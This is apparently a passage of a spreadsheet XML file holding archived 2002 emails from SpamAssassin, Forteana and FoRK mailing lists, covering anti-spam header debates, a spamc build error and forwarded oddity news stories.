    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: Robin Lynn Frank &lt;rlfrank@paradigm-omega.com&gt;\nDate: Wed, 28 Aug 2002 13:50:07 -0700</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 13:50:07 -0700</t>
  </si>
  <si>
    <t>Robin Lynn Frank &lt;rlfrank@paradigm-omega.com&gt;</t>
  </si>
  <si>
    <t>-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nOn Wednesday 28 August 2002 01:34 pm, Brian McNett wrote:\n\n&gt;\n&gt; Uh... the reason is simple. Habeas runs something called the\n&gt; "Habeas Infringers List", and if you use their trademark without\n&gt; their permission, you'll end up on it.  Then, when you send spam\n&gt; with the misappropriated header, users of SA (2.40 supports\n&gt; this) will tag your mail as spam, rather than let it through.\n&gt; This may be done independantly of your IP address, so be\n&gt; prepared to constantly change domain names, and move your\n&gt; servers as fast as you send spam.\n&gt;\n&gt; Also, that little haiku is a copyrighted work, so not only CAN\n&gt; Habeas sue, they MUST sue to protect their copyright. And since\n&gt; it's a trademark as well, that's a double-whammy. Habeas has\n&gt; some pretty high-powered legal people, who will gladly go to\n&gt; town on violators.\n&gt;\n&gt; The whole point here is to give them the legal leverage they\n&gt; need to put spammers out of business, and not only block mail\n&gt; from them, but allow through the things that really AREN'T spam.\n&gt;\n&gt; --B\n&gt;\nAnd if a spammer forges headers???\n- -- \n- ------------------------------------------------------------------------\nRobin Lynn Frank---Director of Operations---Paradigm, Omega, LLC\n[URL]http://paradigm-omega.com[/URL]              [URL]http://paradigm-omega.net[/URL]\n 2002.  All rights reserved.  No duplication/dissemination permitted.\nUse of PGP/GPG encrypted mail preferred. No HTML/attachments accepted.\nFingerprint:  08E0 567C 63CC 5642 DB6D  D490 0F98 D7D3 77EA 3714\nKey Server:  [URL]http://paradigm-omega.com[/URL]\n- ------------------------------------------------------------------------\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.7 (GNU/Linux)\n\niD8DBQE9bTeHD5jX03fqNxQRArMEAJ4l1p6ToRVaG4j+Dy3R2tzfD9FNvgCfRhU3\nkZo/MbYBSLyI/m1vsN4ZYmM=\n=miJB\n-----END PGP SIGNATURE-----\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http://paradigm-omega.com http://paradigm-omega.net http://paradigm-omega.com http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: "'zzzzteana@yahoogroups.com'" &lt;zzzzteana@yahoogroups.com&gt;\nFrom: Andy &lt;andy@r2-dvd.org&gt;\nDate: Wed, 28 Aug 2002 13:47:35 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 13:47:35 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] Big cats 'on the increase'</t>
  </si>
  <si>
    <t>[URL]http://news.bbc.co.uk[/URL]\n\n\nBig cats are on the loose in Britain and breeding their way towards record\nnumbers, a monitoring group has claimed. \nThe British Big Cats Society said it has received more than 800 reports of\nanimals including pumas, black panthers, leopards and so-called Fen tigers\nover the past 12 months. \n\nAnd while it admits that many sightings are of nothing more exotic than the\naverage moggy, it claims to have "firm evidence" that the majority are real.\n\n\nSociety founder Daniel Bamping told BBC News Online he could cope with the\ncritics and doubters, adding: "I was a sceptic, I thought it was in the same\nrealm as the Loch Ness monster. \n\n"But it's not, they are really out there." \n\n'Cats with cubs' \n\nMr Bamping said there have been reports of big cats from every corner of the\ncountry. \n\nBig cat reports  \nHotspots include Scotland and Gloucestershire \nJanuary 2002 - Kent man clawed by suspected Lynx \nNovember 2001 - farmer reports animals mauled by big cat \nApril 2001 - Lynx captured in north London \n1999 - Puma-like cat attacks horse in Wales  \n"This weekend alone I have had sightings from Wales, the Scottish borders,\nKent, the West Midlands, Devon, Somerset and Wiltshire," he said. \n\nThe society claims some of the big cats are breeding with domestic animals. \n\nBut Mr Bamping said others, particularly lynx and puma, probably exist in\nsufficient numbers to breed among themselves. \n\n"We have had sightings of cats with cubs," he added. \n\n'Trigger camera' \n\nThe society claims to have evidence proving the cats' existence, including\nphotographs, paw prints, sheep kills and hair samples. \n\nBut it knows it will have to do even more to convince a sceptical public\nthat it is not spinning them a shaggy cat story. \n\nA national "trigger camera" project is planned which, the society hopes,\nwill provide footage to prove the existence of the big cats. \n\nMr Bamping said: "The idea is that the cat will walk past the camera and\ntake a picture of itself." \n\n'Like dogs' \n\nThe society believes many of the sighting are of pets released into the\nwild, or their descendants. \n\nIts spokesman Danny Nineham said: "In the 1960s and 1970s, people had big\ncats like leopards as pets and they used to walk them like dogs. \n\n"But in 1976 when the Dangerous Wild Animals Act came into force, people\nreleased their cats because they did not want to pay for a licence, put them\ndown, or take them to a zoo."\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: Jim McCullars &lt;mccullj@email.uah.edu&gt;\nDate: Wed, 28 Aug 2002 13:47:14 -0500</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 13:47:14 -0500</t>
  </si>
  <si>
    <t>Jim McCullars &lt;mccullj@email.uah.edu&gt;</t>
  </si>
  <si>
    <t>Hi, I'm trying to build SA under Digital Unix 4.0f and am receiving a\ncompile error (and many warnings) for spamc.  The "perl Makefile.PL"\ndoes OK, but when I do the make, I get this:\n\ncc -std -fprm d -ieee -D_INTRINSICS -I/usr/local/include -DLANGUAGE_C\n-O4 spamd\n/spamc.c  -o spamd/spamc -L/usr/local/lib -lbind -ldbm -ldb -lm -liconv\n-lutil\ncc: Error: spamd/spamc.c, line 50: In this declaration, "in_addr_t" has\nno linka\nge and has a prior declaration in this scope at line number 592 in file\n/usr/inc\nlude/sys/types.h. (nolinkage)\ntypedef unsigned long   in_addr_t;      /* base type for internet\naddress */\n------------------------^\ncc: Warning: spamd/spamc.c, line 169: In this statement, the referenced\ntype of\nthe pointer value "msg_buf" is "char", which is not compatible with\n"unsigned ch\nar". (ptrmismatch)\n  if((bytes = full_read (in, msg_buf, max_size+1024, max_size+1024)) &gt;\nmax_size)\n-----------------------------^\ncc: Warning: spamd/spamc.c, line 174: In this statement, the referenced\ntype of\nthe pointer value "header_buf" is "char", which is not compatible with\n"const un\nsigned char". (ptrmismatch)\n    full_write (out,header_buf,bytes2);\n--------------------^\ncc: Warning: spamd/spamc.c, line 202: In this statement, the referenced\ntype of\nthe pointer value "header_buf" is "char", which is not compatible with\n"const un\nsigned char". (ptrmismatch)\n    full_write (out,header_buf,bytes2);\n--------------------^\ncc: Warning: spamd/spamc.c, line 203: In this statement, the referenced\ntype of\nthe pointer value "msg_buf" is "char", which is not compatible with\n"const unsig\nned char". (ptrmismatch)\n    full_write (out,msg_buf,bytes);\n--------------------^\ncc: Warning: spamd/spamc.c, line 306: In this statement, the referenced\ntype of\nthe pointer value "buf" is "char", which is not compatible with\n"unsigned char".\n (ptrmismatch)\n          if(full_read (in,buf,2,2) != 2 || !('\r' == buf[0] &amp;&amp; '\n' ==\nbuf[1]))\n---------------------------^\ncc: Warning: spamd/spamc.c, line 321: In this statement, the referenced\ntype of\nthe pointer value "buf" is "char", which is not compatible with\n"unsigned char".\n (ptrmismatch)\n    while((bytes=full_read (in,buf,8192, 8192)) &gt; 0)\n-------------------------------^\ncc: Warning: spamd/spamc.c, line 348: In this statement, the referenced\ntype of\nthe pointer value "out_buf" is "char", which is not compatible with\n"const unsig\nned char". (ptrmismatch)\n      full_write (out, out_buf, out_index);\n-----------------------^\ncc: Warning: spamd/spamc.c, line 497: In this statement, the referenced\ntype of\nthe pointer value "msg_buf" is "char", which is not compatible with\n"const unsig\nned char". (ptrmismatch)\n      full_write (STDOUT_FILENO,msg_buf,amount_read);\n--------------------------------^\ncc: Warning: spamd/spamc.c, line 512: In this statement, the referenced\ntype of\nthe pointer value "msg_buf" is "char", which is not compatible with\n"const unsig\nned char". (ptrmismatch)\n      full_write(STDOUT_FILENO,msg_buf,amount_read);\n-------------------------------^\n*** Exit 1\nStop.\n\nCan anyone suggest a way to get around this?   TIA...\n\nJim McCullars\nThe University of Alabama in Huntsville\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spamassassin-talk@example.sourceforge.net\nFrom: Brian McNett &lt;bmcnett@radparker.com&gt;\nDate: Wed, 28 Aug 2002 13:34:11 -0700</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 13:34:11 -0700</t>
  </si>
  <si>
    <t>On Wednesday, August 28, 2002, at 11:48  AM, Robin Lynn Frank wrote:\n\n&gt; If I were a spammer, I'd simply set up a server, send out my \n&gt; spam with the\n&gt; Habeus headers and continue till I was reasonably certain I'd \n&gt; been reported.\n&gt; Then I'd simply reconfigure the server and reconnect to a \n&gt; different IP.  As\n&gt; long as no one can establish my connection to the web sites my spam is\n&gt; directing people to, I'm home free.\n\nUh... the reason is simple. Habeas runs something called the \n"Habeas Infringers List", and if you use their trademark without \ntheir permission, you'll end up on it.  Then, when you send spam \nwith the misappropriated header, users of SA (2.40 supports \nthis) will tag your mail as spam, rather than let it through. \nThis may be done independantly of your IP address, so be \nprepared to constantly change domain names, and move your \nservers as fast as you send spam.\n\nAlso, that little haiku is a copyrighted work, so not only CAN \nHabeas sue, they MUST sue to protect their copyright. And since \nit's a trademark as well, that's a double-whammy. Habeas has \nsome pretty high-powered legal people, who will gladly go to \ntown on violators.\n\nThe whole point here is to give them the legal leverage they \nneed to put spammers out of business, and not only block mail \nfrom them, but allow through the things that really AREN'T spam.\n\n--B\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zzzzteana@yahoogroups.com\nFrom: "Martin Adamson" &lt;martin@srv0.ems.ed.ac.uk&gt;\nDate: Wed, 28 Aug 2002 13:32:56 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 13:32:56 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] 'Lost' penguins found alive</t>
  </si>
  <si>
    <t>Evening Standard - 28 August 2002\n\n[Deft use of Fortean Unit of Measurement in 2nd para - MA]\n\n 'Lost' penguins found alive\n \n by Charles Miranda\n\n A colony of emperor penguins which was thought to have starved to death in\n Antarctica has been found alive in a "big huddle". \n\n The birds were spotted by the crew of a USAF jet returning to base in New\n Zealand. Researchers had feared that a breakaway iceberg the size of Jamaica\n had all but wiped out the colony at Cape Crozier on Ross Island. \n \n Thousands of chicks are believed to have died as an increase in sea ice made\n it impossible for the adults to find food. A detailed count is planned in\n October. Antarctica (New Zealand) chief executive Lou Sanson said: "The\n penguins were in a big huddle. We can now hope that the emperors have had a\n successful breeding season over the winter." \n \n Some 1,000 pairs of emperors - the largest penguins in the world at 3.3ft tall\n and 88lb - usually nest at Cape Crozier, 50 miles from the US McMurdo research\n station. The 200,000-strong Adelie penguin colony, which also nests at the\n cape, may have lost up to third of its population. \n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: zzzzteana &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "Tim Chapman" &lt;timc@2ubh.com&gt;\nDate: Wed, 28 Aug 2002 13:03:39 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 13:03:39 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] Hot rock</t>
  </si>
  <si>
    <t>[URL]http://yorkshirepost.co.uk[/URL]\n\nClose encounter of burnt kind\n\nIT came from outer space  or did it? Teenager Siobhan Cowton is convinced\nthe object which struck her as she climbed into the family car at her home\nin Northallerton is extra-terrestrial.\nBut while her claims are being treated with a certain amount of studied\nacademic scepticism by experts in these matters, the 14-year-old schoolgirl\nis adamant she was hit on the foot by a meteorite.\nSiobhan initially thought there was a more prosaic explanation  that the\nodd-looking stone had been thrown at her by a child,.\nBut on closer inspection, she discovered all was not as it seemed  because\nit was hot when she picked it up. It hit her on a foot but caused no injury.\n"I looked at it again and it had a black and grey colour with a shiny bubble\nsurface," she said.\nAfter closer inspection by her father Niel, and comparison with pictures on\nthe Internet, Siobhan plans to ask scientists at Durham University to check\nthe object for authenticity.\nIf it is from outer space, Siobhan says she will consider putting it up for\nauction.\nShe added: "If it isn't worth anything then I suppose I will keep it myself\nfor sentimental value. It is not every day that you are hit by a meteorite."\nBut Dr Ben Horton, a lecturer in physical geography, was the acme of\nacademic caution.\n"Meteors have features that can be used to establish whether it is a piece\nof extraterrestrial rock," he said.\n"They have a very smooth surface but sometimes they have shallow depressions\nand cavities. If they are hot, they should have a black ash like crust burnt\naround the edge.\n"Most are between five and 60 centimetres but five centimetres is the\nsmallest that they usually appear."\nTo establish the provenance of Siobhan's suspected meteorite it would have\nto be subject to a mineral breakdown but Dr Horton thinks the chances of it\nbeing extra-terrestrial are slim.\n"Around 50,000 a year strike the Earth's surface and, considering the size\nof the Earth, it is very unlikely to be a meteorite.\n"However, there is a possibility and there is no reason it couldn't happen,"\nhe added. \n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://yorkshirepost.co.uk http://us.click.yahoo.com http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: "FoRK" &lt;FoRK@xent.com&gt;\nFrom: "Jim Whitehead" &lt;ejw@cse.ucsc.edu&gt;\nDate: Wed, 28 Aug 2002 13:01:54 -0700</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 13:01:54 -0700</t>
  </si>
  <si>
    <t>"Jim Whitehead" &lt;ejw@cse.ucsc.edu&gt;</t>
  </si>
  <si>
    <t>"FoRK" &lt;FoRK@xent.com&gt;</t>
  </si>
  <si>
    <t>RIAA site hacked overnight</t>
  </si>
  <si>
    <t>First seen on Dave Winer's Scrpiting News ([URL]www.scripting.com[/URL] Details here:\n\n[URL]http://www.digichapman.com[/URL]\n\n- Jim</t>
  </si>
  <si>
    <t>www.scripting.com http://www.digichapman.com</t>
  </si>
  <si>
    <t>To: zzzzteana &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "Tim Chapman" &lt;timc@2ubh.com&gt;\nDate: Wed, 28 Aug 2002 13:01:34 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 13:01:34 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] Lincs lizard</t>
  </si>
  <si>
    <t>[URL]http://yorkshirepost.co.uk[/URL]\n\n2.5ft lizard 'abandoned' at resort\n\nHolidaymakers at a seaside resort were stunned to find a 2.5ft lizard\nsunning itself at a caravan park close to a beach.\nThe savannah monitor lizard was captured at Chapel St Leonards, Lincs, on\nSunday by a member of the public before being collected by an RSPCA team.\nRSPCA officer Justin Stubbs, who took the lizard to a specialist carer,\nsaid: "Savannah monitors can give a nasty bite and we certainly wouldn't\nhave wanted one loose in a busy holiday resort for long."\nOfficials believe the animal may have been abandoned by a private owner\nbecause it has not been reported missing.\nSavannah monitor lizards originate in Africa and are carnivorous, eating\nrats and small rodents. They can grow to 4ft in length.\nAnyone with information about the lizard can contact the RSPCA in confidence\non 08705 555 999.\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: "Rossz Vamos-Wentworth" &lt;rossz@vamos-wentworth.org&gt;\nDate: Wed, 28 Aug 2002 12:56:10 -0800</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 12:56:10 -0800</t>
  </si>
  <si>
    <t>"Rossz Vamos-Wentworth" &lt;rossz@vamos-wentworth.org&gt;</t>
  </si>
  <si>
    <t>Re: [SAtalk] custom score for a given domain?</t>
  </si>
  <si>
    <t>&gt; the number 1 ISP in France and the third ISP in\n&gt; Europe Wanadoo.fr is using non RFC2822 compliant\n&gt; mail servers:\n\nWanadoo.fr is notorious for being unresponsive to spam abuse \ncomplaints.  Some of the more militant admins have blocked them \ncompletely.\n\nRossz\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zzzzteana@yahoogroups.com'" &lt;zzzzteana@yahoogroups.com&gt;\nFrom: Steve Burt &lt;Steve_Burt@cursor-system.com&gt;\nDate: Wed, 28 Aug 2002 12:03:28 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 12:03:28 +0100</t>
  </si>
  <si>
    <t>Steve Burt &lt;Steve_Burt@cursor-system.com&gt;</t>
  </si>
  <si>
    <t>[zzzzteana] RE:Pictish</t>
  </si>
  <si>
    <t>Barbara wrote:\nPictish pictograms (still undeciphered)\n-----------------------\nI'd be interested in an update on the latest thinking on these things.\nParticularly the 'swimming elephant' pictogram.\n\nThere's a book come out recently on the world's undeciphered scripts\n(including Linear A and Etruscan).\nHas any list member read it?\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: Robin Lynn Frank &lt;rlfrank@paradigm-omega.com&gt;\nDate: Wed, 28 Aug 2002 11:48:12 -0700</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 11:48:12 -0700</t>
  </si>
  <si>
    <t>[SAtalk] O.T. Habeus -- Why?</t>
  </si>
  <si>
    <t>-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nI may be dense, but why would anyone want to utilize Habeus?  To me, it looks \nlike a potential backdoor to anyone's defenses against spam.\n\nIf I were a spammer, I'd simply set up a server, send out my spam with the \nHabeus headers and continue till I was reasonably certain I'd been reported.  \nThen I'd simply reconfigure the server and reconnect to a different IP.  As \nlong as no one can establish my connection to the web sites my spam is \ndirecting people to, I'm home free.\n\nSince I can set up spamassassin to I don't "lose" any email, what do I gain \nby making it easier for spam to get through??\n- -- \n- ------------------------------------------------------------------------\nRobin Lynn Frank---Director of Operations---Paradigm, Omega, LLC\n[URL]http://paradigm-omega.com[/URL]              [URL]http://paradigm-omega.net[/URL]\n 2002.  All rights reserved.  No duplication/dissemination permitted.\nUse of PGP/GPG encrypted mail preferred. No HTML/attachments accepted.\nFingerprint:  08E0 567C 63CC 5642 DB6D  D490 0F98 D7D3 77EA 3714\nKey Server:  [URL]http://paradigm-omega.com[/URL]\n- ------------------------------------------------------------------------\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.7 (GNU/Linux)\n\niD8DBQE9bRrzD5jX03fqNxQRAjQnAJsE55BZGj0MGZdLTuBTUZqTGeQLwQCfXPzV\nqfH+nyAg+m+ZKNvLi2BcJGI=\n=YsRI\n-----END PGP SIGNATURE-----\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lt;spamassassin-talk@example.sourceforge.net&gt;\nFrom: "Tanniel Simonian" &lt;simonian@library.ucr.edu&gt;\nDate: Wed, 28 Aug 2002 11:29:27 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 11:29:27 -0700 (PDT)</t>
  </si>
  <si>
    <t>"Tanniel Simonian" &lt;simonian@library.ucr.edu&gt;</t>
  </si>
  <si>
    <t>Well if you're talking about epiphany, which is in January, then yes it is\n5 months.Some people do celebrate Christmas on january 6th, or even the 13th.\n\nBut I am certain that what you are thinking is the correct thought.\n\nPlease don't flame me. Just trying to be humerous =)\n\n\nMatt Kettler said:\n&gt; On an unrelated, but similarly amusing note, a spam I received (and was\n&gt;  tagged by SA) today began with:\n&gt;\n&gt;\n&gt; &gt; I bet you haven't even realized that Christmas is just 5 months away,\n&gt; &gt;\n&gt; did you?\n&gt;\n&gt;\n&gt; Strangely, no I wasn't aware that Christmas was 5 months away. Here in\n&gt; the  US Christmas is a bit less than 4 months away. Where exactly is\n&gt; the  "international month line" anyway? I've never seen the -74400\n&gt; timezone  before, but I bet it qualifies as INVALID_DATE_TZ_ABSURD :)\n&gt;\n&gt;\n&gt;\n&gt;\n&gt; -------------------------------------------------------\n&gt; This sf.net email is sponsored by: Jabber - The world's fastest growing\n&gt;  real-time communications platform! Don't just IM. Build it in!\n&gt; [URL]http://www.jabber.com[/URL]\n&gt; _______________________________________________\n&gt; Spamassassin-talk mailing list\n&gt; Spamassassin-talk@lists.sourceforge.net\n&gt; [URL]https://lists.sourceforge.net[/URL]\n\n\n\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Bob Sully &lt;rcs@malibyte.com&gt;\nFrom: yyyy@spamassassin.taint.org (Justin Mason)\nDate: Wed, 28 Aug 2002 11:29:13 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 11:29:13 +0100</t>
  </si>
  <si>
    <t>Bob Sully &lt;rcs@malibyte.com&gt;</t>
  </si>
  <si>
    <t>Re: [SAtalk] False Positive of the Week</t>
  </si>
  <si>
    <t>Bob Sully said:\n\n&gt; Spamassassin (2.30) has been tossing my daily LogWatch (3.3) reports into \n&gt; the spam bucket.  A recent one generated the folowing hits: ....\n\nfixed in CVS I think, or at least my logwatches get through fine.  If it\nis not fixed in CVS, then report it, using the correct bug-reporting\nprocedure:\n\n    1. open a Bugzilla bug. [URL]http://bugzilla.SpamAssassin.org[/URL]\n\n    2. attach a sample mail message *as an attachment* with all\n    headers intact\n\n--j.\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http://bugzilla.SpamAssassin.org http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: "Martin Adamson" &lt;martin@srv0.ems.ed.ac.uk&gt;\nDate: Wed, 28 Aug 2002 11:24:30 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 11:24:30 +0100</t>
  </si>
  <si>
    <t>Re: [zzzzteana] The new Steve Earle</t>
  </si>
  <si>
    <t>&gt; CAM'RON associate JUELZ SANTANA has vehemently defended a lyric on the\n&gt; forthcoming album by the pair's DIPLOMATS crew that pays tribute to\n&gt; September 11 hijacker OMAR ATTA\n\nNo, Steve Earle at least USED to make great records.\n\nMartin\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: zzzzteana &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "Tim Chapman" &lt;timc@2ubh.com&gt;\nDate: Wed, 28 Aug 2002 11:22:33 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 11:22:33 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] The new Steve Earle</t>
  </si>
  <si>
    <t>[URL]http://www.nme.com[/URL]\n\nCAM'RON  associate  JUELZ SANTANA  has vehemently defended a lyric on the\nforthcoming album by the pair's  DIPLOMATS  crew that pays tribute to\nSeptember 11 hijacker  OMAR ATTA\n...\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://www.nme.com http://us.click.yahoo.com http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: "Steve Thomas" &lt;sthomas@apexvoice.com&gt;\nFrom: yyyy@spamassassin.taint.org (Justin Mason)\nDate: Wed, 28 Aug 2002 11:21:47 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 11:21:47 +0100</t>
  </si>
  <si>
    <t>"Steve Thomas" &lt;sthomas@apexvoice.com&gt;</t>
  </si>
  <si>
    <t>Re: [SAtalk] Setting up a spam eating address</t>
  </si>
  <si>
    <t>"Steve Thomas" said:\n\n&gt; I created a user (honeypot) and set up an alias to it. Then I added a\n&gt; 'hidden' (font color same as background color) link to that address at the\n&gt; bottom of my html pages. The .procmailrc file for that user is: .....\n&gt; which will submit the msg to razor then save it locally. I set this up about\n&gt; a month ago, and haven't received anything other than some viruses (Sircam)\n&gt; on it yet. The viruses are rejected at the MTA level, so they're not being\n&gt; saved/reported to razor.\n\nFWIW, I would now recommend doing this (using a user with a procmailrc)\ninstead of a system alias; more secure, and easier to filter out crud\nlike bounces, virii etc. that render a corpus dirty.\n\n--j.\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zzzzteana@yahoogroups.com\nFrom: "uncle_slacky" &lt;robert.chambers@baesystems.com&gt;\nDate: Wed, 28 Aug 2002 11:20:41 -0000</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 11:20:41 -0000</t>
  </si>
  <si>
    <t>"uncle_slacky" &lt;robert.chambers@baesystems.com&gt;</t>
  </si>
  <si>
    <t>[zzzzteana] Re: That wacky imam</t>
  </si>
  <si>
    <t>--- In forteana@y..., "Martin Adamson"  wrote: &gt; For an alternative, and rather more factually based, rundown on  Hamza's  &gt; career, including his belief that all non Muslims in Yemen should  be murdered  &gt; outright: &gt;  &gt; [URL]http://memri.org[/URL] And we know how unbiased MEMRI is, don't we.... [URL]http://www.guardian.co.uk[/URL],7792,773258,00. html Rob ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt; 4 DVDs Free +s&amp;p Join Now [URL]http://us.click.yahoo.com[/URL] ---------------------------------------------------------------------~-&gt; To unsubscribe from this group, send an email to: forteana-unsubscribe@egroups.com   Your use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://memri.org http://www.guardian.co.uk http://us.click.yahoo.com http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: Barbara Barrett &lt;barbarabarrett@orchidserve.com&gt;\nDate: Wed, 28 Aug 2002 11:15:49 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 11:15:49 +0100</t>
  </si>
  <si>
    <t>Barbara Barrett &lt;barbarabarrett@orchidserve.com&gt;</t>
  </si>
  <si>
    <t>Re: [zzzzteana] FWD [fort] Evidence Britons Were In The US In The6th Century</t>
  </si>
  <si>
    <t>&gt; &gt; Barbara Blithered;\n&gt; &gt; Others indicators this was a late invention are the use of the f rune\n&gt; &gt; not only for "f", but inverted to mean "ff" (the welsh "v" phoneme) -\n\n&gt; Stew Stired; \n&gt; Isn't it the other way round, f(welsh)=v(english) ff(welsh)=f(english).\n\nBarbara Babbles;\nMea culpa. That's what I get for reading my welsh dictionary upside\ndown; "F"n trouble ;-).\nBarbara\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: Barbara Barrett &lt;barbarabarrett@orchidserve.com&gt;\nDate: Wed, 28 Aug 2002 11:15:12 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 11:15:12 +0100</t>
  </si>
  <si>
    <t>Re: [zzzzteana] Secondhand books online</t>
  </si>
  <si>
    <t>&gt; Martin Mentioned:\n&gt; &gt;I've used this a few times and can thoroughly recommend it. It really \n&gt; &gt;doeswork. Frankly, the only drawback is finding too much stuff.\n\n&gt;Rachel Rote; \n&gt; I'll be amazed if there's anyone on here who isn't already a heavy user!\n\nBarbara Babbles;\nBe amazed - I've never bought anything online since an almighty cock up\nwith amazon dot con (that's not a typo) a few years back where I lost\nall the dosh I'd paid them and had no books to show for it either. Had\nit been the UK branch I'd have had them in the small claims court\nquicker than you could drop LOTR on your foot and say "ouch", but as it\nwas the US branch I'd just no comeback.\nBarbara\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: Anders Eriksson &lt;aeriksson@fastmail.fm&gt;\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Wed, 28 Aug 2002 11:07:01 -0500</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 11:07:01 -0500</t>
  </si>
  <si>
    <t>Anders Eriksson &lt;aeriksson@fastmail.fm&gt;</t>
  </si>
  <si>
    <t>Re: Exmh &amp;&amp; speed</t>
  </si>
  <si>
